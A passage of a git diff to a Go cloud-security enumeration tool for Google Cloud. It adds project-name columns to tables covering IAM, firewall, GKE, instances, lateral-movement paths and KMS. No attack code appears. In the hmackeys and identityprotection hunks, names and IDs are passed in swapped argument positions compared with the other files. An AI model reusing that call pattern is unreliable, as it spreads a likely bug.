b/gcp/commands/domainwidedelegation.go @@ -229,6 +229,7 @@ func (m *DomainWideDelegationModule) writeOutput(ctx context.Context, logger int "DWD Enabled", "OAuth2 Client ID", "Keys", + "Project Name", "Project", } @@ -266,6 +267,7 @@ func (m *DomainWideDelegationModule) writeOutput(ctx context.Context, logger int dwdStatus, clientID, keysDisplay, + m.GetProjectName(account.ProjectID), account.ProjectID, }) } @@ -291,6 +293,11 @@ func (m *DomainWideDelegationModule) writeOutput(ctx context.Context, logger int Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -299,7 +306,7 @@ func (m *DomainWideDelegationModule) writeOutput(ctx context.Context, logger int m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/endpoints.go b/gcp/commands/endpoints.go index 00bc1f98..2209f263 100644 --- a/gcp/commands/endpoints.go +++ b/gcp/commands/endpoints.go @@ -504,6 +504,7 @@ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logge "Resource", "Resource Type", "Region", + "Project Name", "Project", "Status", } @@ -518,6 +519,7 @@ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logge ep.Resource, ep.ResourceType, ep.Region, + m.GetProjectName(ep.ProjectID), ep.ProjectID, ep.Status, }) @@ -531,6 +533,7 @@ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logge "Ports", "Target", "Region", + "Project Name", "Project", } @@ -544,6 +547,7 @@ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logge ep.Port, ep.Resource, ep.Region, + m.GetProjectName(ep.ProjectID), ep.ProjectID, }) } @@ -555,6 +559,7 @@ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logge "Address", "Zone", "Status", + "Project Name", "Project", } @@ -566,6 +571,7 @@ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logge ep.Address, ep.Region, ep.Status, + m.GetProjectName(ep.ProjectID), ep.ProjectID, }) } @@ -578,6 +584,7 @@ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logge "Used By", "Region", "Status", + "Project Name", "Project", } @@ -590,6 +597,7 @@ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logge ep.Resource, ep.Region, ep.Status, + m.GetProjectName(ep.ProjectID), ep.ProjectID, }) } @@ -646,6 +654,10 @@ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logge } // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } err := internal.HandleOutputSmart( "gcp", m.Format, @@ -654,7 +666,7 @@ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logge m.WrapTable, "project", // scopeType m.ProjectIDs, // scopeIdentifiers - m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + scopeNames, // scopeNames m.Account, output, ) diff --git a/gcp/commands/filestore.go b/gcp/commands/filestore.go index f20c4794..85c3d4f5 100644 --- a/gcp/commands/filestore.go +++ b/gcp/commands/filestore.go @@ -99,7 +99,7 @@ func (m *FilestoreModule) addToLoot(instance filestoreservice.FilestoreInstanceI } func (m *FilestoreModule) writeOutput(ctx context.Context, logger internal.Logger) { - header := []string{"Name", "Location", "Tier", "Network", "IP", "Shares", "State", "Project"} + header := []string{"Name", "Location", "Tier", "Network", "IP", "Shares", "State", "Project Name", "Project"} var body [][]string for _, instance := range m.Instances { @@ -115,6 +115,7 @@ func (m *FilestoreModule) writeOutput(ctx context.Context, logger internal.Logge strings.Join(instance.IPAddresses, ", "), strings.Join(shareNames, ", "), instance.State, + m.GetProjectName(instance.ProjectID), instance.ProjectID, }) } @@ -131,6 +132,11 @@ func (m *FilestoreModule) writeOutput(ctx context.Context, logger internal.Logge Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + "project", m.ProjectIDs, scopeNames, m.Account, output) } diff --git a/gcp/commands/firewall.go b/gcp/commands/firewall.go index e74c7f21..923c79fa 100644 --- a/gcp/commands/firewall.go +++ b/gcp/commands/firewall.go @@ -509,6 +509,7 @@ func (m *FirewallModule) addFirewallSecurityRecommendations(rule NetworkService. func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger) { // Firewall rules table rulesHeader := []string{ + "Project Name", "Project ID", "Rule Name", "Network", @@ -552,6 +553,7 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger } rulesBody = append(rulesBody, []string{ + m.GetProjectName(rule.ProjectID), rule.ProjectID, rule.Name, rule.Network, @@ -567,6 +569,7 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger // Networks table networksHeader := []string{ + "Project Name", "Project ID", "Network Name", "Routing Mode", @@ -600,6 +603,7 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger } networksBody = append(networksBody, []string{ + m.GetProjectName(network.ProjectID), network.ProjectID, network.Name, network.RoutingMode, @@ -611,6 +615,7 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger // Subnets table subnetsHeader := []string{ + "Project Name", "Project ID", "Network", "Subnet Name", @@ -627,6 +632,7 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger } subnetsBody = append(subnetsBody, []string{ + m.GetProjectName(subnet.ProjectID), subnet.ProjectID, subnet.Network, subnet.Name, @@ -676,6 +682,11 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -684,7 +695,7 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/functions.go b/gcp/commands/functions.go index 143cefc8..b5a58ea6 100644 --- a/gcp/commands/functions.go +++ b/gcp/commands/functions.go @@ -476,6 +476,7 @@ func (m *FunctionsModule) addSecurityAnalysisToLoot(analysis FunctionsService.Fu func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logger) { // Main functions table header := []string{ + "Project Name", "Project ID", "Name", "Region", @@ -520,6 +521,7 @@ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logge } body = append(body, []string{ + m.GetProjectName(fn.ProjectID), fn.ProjectID, fn.Name, fn.Region, @@ -537,6 +539,7 @@ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logge // HTTP endpoints table httpHeader := []string{ "Function", + "Project Name", "Project ID", "URL", "Ingress", @@ -553,6 +556,7 @@ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logge } httpBody = append(httpBody, []string{ fn.Name, + m.GetProjectName(fn.ProjectID), fn.ProjectID, fn.TriggerURL, fn.IngressSettings, @@ -565,6 +569,7 @@ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logge // Public functions table publicHeader := []string{ "Function", + "Project Name", "Project ID", "Region", "URL", @@ -577,6 +582,7 @@ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logge if fn.IsPublic { publicBody = append(publicBody, []string{ fn.Name, + m.GetProjectName(fn.ProjectID), fn.ProjectID, fn.Region, fn.TriggerURL, @@ -590,6 +596,7 @@ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logge securityHeader := []string{ "Risk", "Function", + "Project Name", "Project", "Region", "Public", @@ -620,6 +627,7 @@ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logge securityBody = append(securityBody, []string{ analysis.RiskLevel, analysis.FunctionName, + m.GetProjectName(analysis.ProjectID), analysis.ProjectID, analysis.Region, publicStatus, @@ -631,6 +639,7 @@ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logge // Source code locations table sourceHeader := []string{ "Function", + "Project Name", "Project", "Source Type", "Source Location", @@ -641,6 +650,7 @@ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logge if fn.SourceLocation != "" { sourceBody = append(sourceBody, []string{ fn.Name, + m.GetProjectName(fn.ProjectID), fn.ProjectID, fn.SourceType, fn.SourceLocation, @@ -707,6 +717,11 @@ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logge Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -715,7 +730,7 @@ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logge m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/gke.go b/gcp/commands/gke.go index 8848cdc3..19683311 100644 --- a/gcp/commands/gke.go +++ b/gcp/commands/gke.go @@ -488,6 +488,7 @@ func (m *GKEModule) addNodePoolSecurityToLoot(np GKEService.NodePoolInfo) { func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { // Main clusters table with enhanced columns header := []string{ + "Project Name", "Project ID", "Name", "Location", @@ -525,6 +526,7 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { } body = append(body, []string{ + m.GetProjectName(cluster.ProjectID), cluster.ProjectID, cluster.Name, cluster.Location, @@ -544,6 +546,7 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { // Security issues table issuesHeader := []string{ "Cluster", + "Project Name", "Project ID", "Location", "Issue", @@ -554,6 +557,7 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { for _, issue := range cluster.SecurityIssues { issuesBody = append(issuesBody, []string{ cluster.Name, + m.GetProjectName(cluster.ProjectID), cluster.ProjectID, cluster.Location, issue, @@ -565,6 +569,7 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { nodePoolHeader := []string{ "Cluster", "Node Pool", + "Project Name", "Project ID", "Machine Type", "Node Count", @@ -592,6 +597,7 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { nodePoolBody = append(nodePoolBody, []string{ np.ClusterName, np.Name, + m.GetProjectName(np.ProjectID), np.ProjectID, np.MachineType, fmt.Sprintf("%d", np.NodeCount), @@ -606,6 +612,7 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { analysisHeader := []string{ "Risk", "Cluster", + "Project Name", "Project", "Attack Surface", "Privesc Paths", @@ -627,6 +634,7 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { analysisBody = append(analysisBody, []string{ analysis.RiskLevel, analysis.ClusterName, + m.GetProjectName(analysis.ProjectID), analysis.ProjectID, attackSummary, privescSummary, @@ -640,6 +648,7 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { "Service Account", "Cloud Platform Scope", "Risky Scopes", + "Project Name", "Project", } @@ -664,6 +673,7 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { np.ServiceAccount, cloudPlatform, scopeCount, + m.GetProjectName(np.ProjectID), np.ProjectID, }) } @@ -672,6 +682,7 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { // Cluster configuration table (addons and maintenance) configHeader := []string{ "Cluster", + "Project Name", "Project ID", "Mode", "Release Channel", @@ -702,6 +713,7 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { } configBody = append(configBody, []string{ cluster.Name, + m.GetProjectName(cluster.ProjectID), cluster.ProjectID, clusterMode, releaseChannel, @@ -774,6 +786,11 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -782,7 +799,7 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/hmackeys.go b/gcp/commands/hmackeys.go index a468a89f..8b87738a 100644 --- a/gcp/commands/hmackeys.go +++ b/gcp/commands/hmackeys.go @@ -183,6 +183,7 @@ func (m *HMACKeysModule) writeOutput(ctx context.Context, logger internal.Logger "Created", "Age (Days)", "Risk", + "Project Name", "Project", } @@ -201,6 +202,7 @@ func (m *HMACKeysModule) writeOutput(ctx context.Context, logger internal.Logger key.TimeCreated.Format("2006-01-02"), age, key.RiskLevel, + m.GetProjectName(key.ProjectID), key.ProjectID, }) } @@ -212,6 +214,7 @@ func (m *HMACKeysModule) writeOutput(ctx context.Context, logger internal.Logger "Created", "Risk", "Risk Reasons", + "Project Name", "Project", } @@ -224,6 +227,7 @@ func (m *HMACKeysModule) writeOutput(ctx context.Context, logger internal.Logger key.TimeCreated.Format("2006-01-02"), key.RiskLevel, strings.Join(key.RiskReasons, "; "), + m.GetProjectName(key.ProjectID), key.ProjectID, }) } @@ -256,6 +260,11 @@ func (m *HMACKeysModule) writeOutput(ctx context.Context, logger internal.Logger output := HMACKeysOutput{Table: tables, Loot: lootFiles} + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -263,7 +272,7 @@ func (m *HMACKeysModule) writeOutput(ctx context.Context, logger internal.Logger m.Verbosity, m.WrapTable, "project", - m.ProjectIDs, + scopeNames, m.ProjectIDs, m.Account, output, diff --git a/gcp/commands/iam.go b/gcp/commands/iam.go index a346b9c8..5135d64a 100644 --- a/gcp/commands/iam.go +++ b/gcp/commands/iam.go @@ -426,6 +426,7 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { "Inherited", "Condition", "Source", + "Project Name", "Project", } @@ -476,6 +477,7 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { inherited, condition, source, + m.GetProjectName(binding.ResourceID), binding.ResourceID, }) } @@ -488,6 +490,7 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { "Disabled", "Has Keys", "Key Count", + "Project Name", "Project", } @@ -510,6 +513,7 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { disabled, hasKeys, fmt.Sprintf("%d", sa.KeyCount), + m.GetProjectName(sa.ProjectID), sa.ProjectID, }) } @@ -521,6 +525,7 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { "Stage", "Permissions", "Deleted", + "Project Name", "Project", } @@ -537,6 +542,7 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { role.Stage, fmt.Sprintf("%d", role.PermissionCount), deleted, + m.GetProjectName(role.ProjectID), role.ProjectID, }) } @@ -546,6 +552,7 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { "Group Email", "Role Count", "High Privilege", + "Project Name", "Project", } @@ -563,6 +570,7 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { group.Email, fmt.Sprintf("%d", len(group.Roles)), hasHighPriv, + m.GetProjectName(group.ProjectID), group.ProjectID, }) } @@ -573,6 +581,7 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { "Type", "High Priv Roles", "Custom Roles", + "Project Name", "Project", } @@ -596,6 +605,7 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { principal.Type, strings.Join(highPrivRoles, ", "), customRolesStr, + m.GetProjectName(principal.ResourceID), principal.ResourceID, }) } @@ -662,6 +672,7 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { "Role", "Condition Title", "Condition Expression", + "Project Name", "Project", } @@ -675,6 +686,7 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { binding.Role, binding.ConditionInfo.Title, truncateString(binding.ConditionInfo.Expression, 80), + m.GetProjectName(binding.ResourceID), binding.ResourceID, }) } @@ -707,15 +719,19 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { } // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } err := internal.HandleOutputSmart( "gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", // scopeType - m.ProjectIDs, // scopeIdentifiers - m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames m.Account, output, ) diff --git a/gcp/commands/iap.go b/gcp/commands/iap.go index b05b5d8a..dee8aceb 100644 --- a/gcp/commands/iap.go +++ b/gcp/commands/iap.go @@ -120,7 +120,7 @@ func (m *IAPModule) writeOutput(ctx context.Context, logger internal.Logger) { var tables []internal.TableFile // Tunnel Destination Groups table - header := []string{"Name", "Region", "CIDRs", "FQDNs", "Risk", "Project"} + header := []string{"Name", "Region", "CIDRs", "FQDNs", "Risk", "Project Name", "Project"} var body [][]string for _, group := range m.TunnelDestGroups { cidrs := strings.Join(group.CIDRs, ", ") @@ -138,6 +138,7 @@ func (m *IAPModule) writeOutput(ctx context.Context, logger internal.Logger) { cidrs, fqdns, group.RiskLevel, + m.GetProjectName(group.ProjectID), group.ProjectID, }) } @@ -155,6 +156,7 @@ func (m *IAPModule) writeOutput(ctx context.Context, logger internal.Logger) { group.Name, group.RiskLevel, strings.Join(group.RiskReasons, "; "), + m.GetProjectName(group.ProjectID), group.ProjectID, }) } @@ -163,7 +165,7 @@ func (m *IAPModule) writeOutput(ctx context.Context, logger internal.Logger) { if len(highRiskBody) > 0 { tables = append(tables, internal.TableFile{ Name: "iap-risks", - Header: []string{"Group", "Risk Level", "Reasons", "Project"}, + Header: []string{"Group", "Risk Level", "Reasons", "Project Name", "Project"}, Body: highRiskBody, }) } @@ -177,8 +179,13 @@ func (m *IAPModule) writeOutput(ctx context.Context, logger internal.Logger) { output := IAPOutput{Table: tables, Loot: lootFiles} + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + "project", m.ProjectIDs, scopeNames, m.Account, output) if err != nil { logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_IAP_MODULE_NAME) } diff --git a/gcp/commands/identityprotection.go b/gcp/commands/identityprotection.go index 1c62db68..99c0345c 100644 --- a/gcp/commands/identityprotection.go +++ b/gcp/commands/identityprotection.go @@ -792,7 +792,8 @@ func (m *IdentityProtectionModule) writeOutput(ctx context.Context, logger inter // Service Account Risks table saRisksHeader := []string{ "Service Account", - "Project", + "Project Name", + "Project ID", "Risk Level", "Keys", "Key Age", @@ -809,6 +810,7 @@ func (m *IdentityProtectionModule) writeOutput(ctx context.Context, logger inter saRisksBody = append(saRisksBody, []string{ truncateString(sa.Email, 40), + m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.RiskLevel, fmt.Sprintf("%d", sa.KeyCount), @@ -823,7 +825,8 @@ func (m *IdentityProtectionModule) writeOutput(ctx context.Context, logger inter "Identity", "Type", "Domain", - "Project", + "Project Name", + "Project ID", "Risk Level", "Details", } @@ -834,6 +837,7 @@ func (m *IdentityProtectionModule) writeOutput(ctx context.Context, logger inter truncateString(e.Principal, 40), e.IdentityType, e.Domain, + m.GetProjectName(e.ProjectID), e.ProjectID, e.RiskLevel, truncateString(e.Details, 40), @@ -906,6 +910,12 @@ func (m *IdentityProtectionModule) writeOutput(ctx context.Context, logger inter Loot: lootFiles, } + // Build scope names using project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + // Write output err := internal.HandleOutputSmart( "gcp", @@ -914,7 +924,7 @@ func (m *IdentityProtectionModule) writeOutput(ctx context.Context, logger inter m.Verbosity, m.WrapTable, "project", - m.ProjectIDs, + scopeNames, m.ProjectIDs, m.Account, output, diff --git a/gcp/commands/instances.go b/gcp/commands/instances.go index 9b1c18b4..94d2bff2 100644 --- a/gcp/commands/instances.go +++ b/gcp/commands/instances.go @@ -615,6 +615,7 @@ func parseSSHKeyLine(line string) SSHKeyParts { func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logger) { // Main table with security-relevant columns header := []string{ + "Project Name", "Project ID", "Name", "Zone", @@ -650,6 +651,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge } body = append(body, []string{ + m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Name, instance.Zone, @@ -670,6 +672,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge // Detailed service account table - shows full SA info with scopes saHeader := []string{ "Instance", + "Project Name", "Project ID", "Zone", "Service Account", @@ -690,6 +693,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge saBody = append(saBody, []string{ instance.Name, + m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Zone, sa.Email, @@ -702,6 +706,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge // Security findings table - highlight risky configurations findingsHeader := []string{ "Instance", + "Project Name", "Project ID", "Zone", "Finding", @@ -715,6 +720,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge if instance.HasDefaultSA { findingsBody = append(findingsBody, []string{ instance.Name, + m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Zone, "Default Service Account", @@ -725,6 +731,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge if instance.HasCloudScopes { findingsBody = append(findingsBody, []string{ instance.Name, + m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Zone, "Broad OAuth Scopes", @@ -735,6 +742,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge if instance.ExternalIP != "" && !instance.OSLoginEnabled { findingsBody = append(findingsBody, []string{ instance.Name, + m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Zone, "External IP without OS Login", @@ -745,6 +753,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge if instance.SerialPortEnabled { findingsBody = append(findingsBody, []string{ instance.Name, + m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Zone, "Serial Port Enabled", @@ -755,6 +764,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge if instance.CanIPForward { findingsBody = append(findingsBody, []string{ instance.Name, + m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Zone, "IP Forwarding Enabled", @@ -765,6 +775,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge if !instance.ShieldedVM { findingsBody = append(findingsBody, []string{ instance.Name, + m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Zone, "Shielded VM Disabled", @@ -775,6 +786,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge if instance.HasStartupScript && instance.HasDefaultSA && instance.HasCloudScopes { findingsBody = append(findingsBody, []string{ instance.Name, + m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Zone, "Startup Script with Broad Access", @@ -787,6 +799,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge // Startup scripts table (pentest-focused) startupHeader := []string{ "Instance", + "Project Name", "Project ID", "Zone", "Script Type", @@ -812,6 +825,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge startupBody = append(startupBody, []string{ instance.Name, + m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Zone, "Inline", @@ -827,6 +841,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge startupBody = append(startupBody, []string{ instance.Name, + m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Zone, "URL", @@ -839,6 +854,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge // Security configuration table securityConfigHeader := []string{ "Instance", + "Project Name", "Project ID", "Zone", "ShieldedVM", @@ -868,6 +884,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge } securityConfigBody = append(securityConfigBody, []string{ instance.Name, + m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Zone, instanceBoolToCheck(instance.ShieldedVM), @@ -883,6 +900,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge // SSH keys table (pentest-focused) sshKeysHeader := []string{ "Source", + "Project Name", "Project ID", "Zone", "Username", @@ -899,6 +917,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge parts := parseSSHKeyLine(key) sshKeysBody = append(sshKeysBody, []string{ "PROJECT", + m.GetProjectName(projectID), projectID, "-", parts.Username, @@ -916,6 +935,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge parts := parseSSHKeyLine(key) sshKeysBody = append(sshKeysBody, []string{ instance.Name, + m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Zone, parts.Username, @@ -992,15 +1012,19 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge } // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } err := internal.HandleOutputSmart( "gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", // scopeType - m.ProjectIDs, // scopeIdentifiers - m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames m.Account, output, ) diff --git a/gcp/commands/kms.go b/gcp/commands/kms.go index 8da7ae6e..fa50e38c 100644 --- a/gcp/commands/kms.go +++ b/gcp/commands/kms.go @@ -283,6 +283,7 @@ func (m *KMSModule) addKeyToLoot(key KMSService.CryptoKeyInfo) { func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { // Crypto keys table keysHeader := []string{ + "Project Name", "Project ID", "Key Name", "Key Ring", @@ -316,6 +317,7 @@ func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { } keysBody = append(keysBody, []string{ + m.GetProjectName(key.ProjectID), key.ProjectID, key.Name, key.KeyRing, @@ -331,6 +333,7 @@ func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { // Key rings table (summary) keyRingsHeader := []string{ + "Project Name", "Project ID", "Key Ring", "Location", @@ -340,6 +343,7 @@ func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { var keyRingsBody [][]string for _, kr := range m.KeyRings { keyRingsBody = append(keyRingsBody, []string{ + m.GetProjectName(kr.ProjectID), kr.ProjectID, kr.Name, kr.Location, @@ -379,6 +383,11 @@ func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -387,7 +396,7 @@ func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/lateralmovement.go b/gcp/commands/lateralmovement.go index 6fed4664..e878e866 100644 --- a/gcp/commands/lateralmovement.go +++ b/gcp/commands/lateralmovement.go @@ -501,7 +501,8 @@ func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal vectorsHeader := []string{ "Resource Type", "Resource", - "Project", + "Project Name", + "Project ID", "Attack Vector", "Risk", } @@ -511,6 +512,7 @@ func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal vectorsBody = append(vectorsBody, []string{ vector.ResourceType, truncateString(vector.ResourceName, 30), + m.GetProjectName(vector.ProjectID), vector.ProjectID, vector.AttackVector, vector.RiskLevel, @@ -519,8 +521,10 @@ func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal // Cross-project paths table crossHeader := []string{ - "Source Project", - "Target Project", + "Source Project Name", + "Source Project ID", + "Target Project Name", + "Target Project ID", "Principal", "Role", "Risk", @@ -529,7 +533,9 @@ func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal var crossBody [][]string for _, path := range m.CrossProjectPaths { crossBody = append(crossBody, []string{ + m.GetProjectName(path.SourceProject), path.SourceProject, + m.GetProjectName(path.TargetProject), path.TargetProject, truncateString(path.Principal, 40), path.Role, @@ -579,6 +585,12 @@ func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal Loot: lootFiles, } + // Build scopeNames using GetProjectName + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + // Write output err := internal.HandleOutputSmart( "gcp", @@ -588,7 +600,7 @@ func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/loadbalancers.go b/gcp/commands/loadbalancers.go index be728c4d..1c55b258 100644 --- a/gcp/commands/loadbalancers.go +++ b/gcp/commands/loadbalancers.go @@ -149,7 +149,7 @@ func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.L var tables 